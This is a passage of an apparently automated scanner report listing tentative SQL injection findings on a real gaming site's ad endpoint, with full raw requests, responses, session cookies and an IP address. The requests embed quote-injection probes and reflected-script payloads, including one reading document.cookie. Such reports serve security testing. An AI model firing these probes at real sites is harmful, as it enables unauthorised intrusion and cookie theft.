1.35. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=380,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11688,11691,11715,11717,11754,14845,15232,16249,16251,17918,17919,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6766,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=zkitkg,bguRragewbmIi [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=380,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11688,11691,11715,11717,11754,14845,15232,16249,16251,17918,17919,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6766,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=zkitkg,bguRragewbmIi

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=380,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11688,11691,11715,11717,11754,14845,15232,16249,16251,17918,17919,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6766,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=zkitkg,bguRragewbmIi HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.2.10.1297040497

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=380,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11688,11691,11715,11717,11754,14845,15232,16249,16251,17918,17919,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6766,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=zkitkg,bguRragewbmIi HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.2.10.1297040497

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:35 GMT
Connection: close
Vary: Accept-Encoding


1.36. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=407,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11690,11716,11754,14845,15232,16249,16251,17917,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bkevoot,bguRrblewbsuy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=407,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11690,11716,11754,14845,15232,16249,16251,17917,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bkevoot,bguRrblewbsuy

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=407,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11690,11716,11754,14845,15232,16249,16251,17917,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bkevoot,bguRrblewbsuy HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:00 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=407,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11690,11716,11754,14845,15232,16249,16251,17917,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bkevoot,bguRrblewbsuy HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:00 GMT
Connection: close
Vary: Accept-Encoding


1.37. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=407,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11690,11716,11754,14845,15232,16249,16251,17917,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cwmukqW,bguRqRgbdmoWu [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=407,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11690,11716,11754,14845,15232,16249,16251,17917,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cwmukqW,bguRqRgbdmoWu

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=407,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11690,11716,11754,14845,15232,16249,16251,17917,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cwmukqW,bguRqRgbdmoWu HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=407,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11690,11716,11754,14845,15232,16249,16251,17917,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cwmukqW,bguRqRgbdmoWu HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:12 GMT
Connection: close
Vary: Accept-Encoding


1.38. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=409,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11691,11717,11754,14845,15232,16249,16251,17919,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bkfKruw,bguRrblewbsuA [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=409,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11691,11717,11754,14845,15232,16249,16251,17919,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bkfKruw,bguRrblewbsuA

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=409,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11691,11717,11754,14845,15232,16249,16251,17919,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bkfKruw,bguRrblewbsuA HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:02 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=409,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11691,11717,11754,14845,15232,16249,16251,17919,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bkfKruw,bguRrblewbsuA HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:02 GMT
Connection: close
Vary: Accept-Encoding


1.39. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=409,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11691,11717,11754,14845,15232,16249,16251,17919,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bvtAjns,bguRqRgbdmoWx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=409,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11691,11717,11754,14845,15232,16249,16251,17919,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bvtAjns,bguRqRgbdmoWx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=409,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11691,11717,11754,14845,15232,16249,16251,17919,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bvtAjns,bguRqRgbdmoWx HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:14 GMT
Connection: close
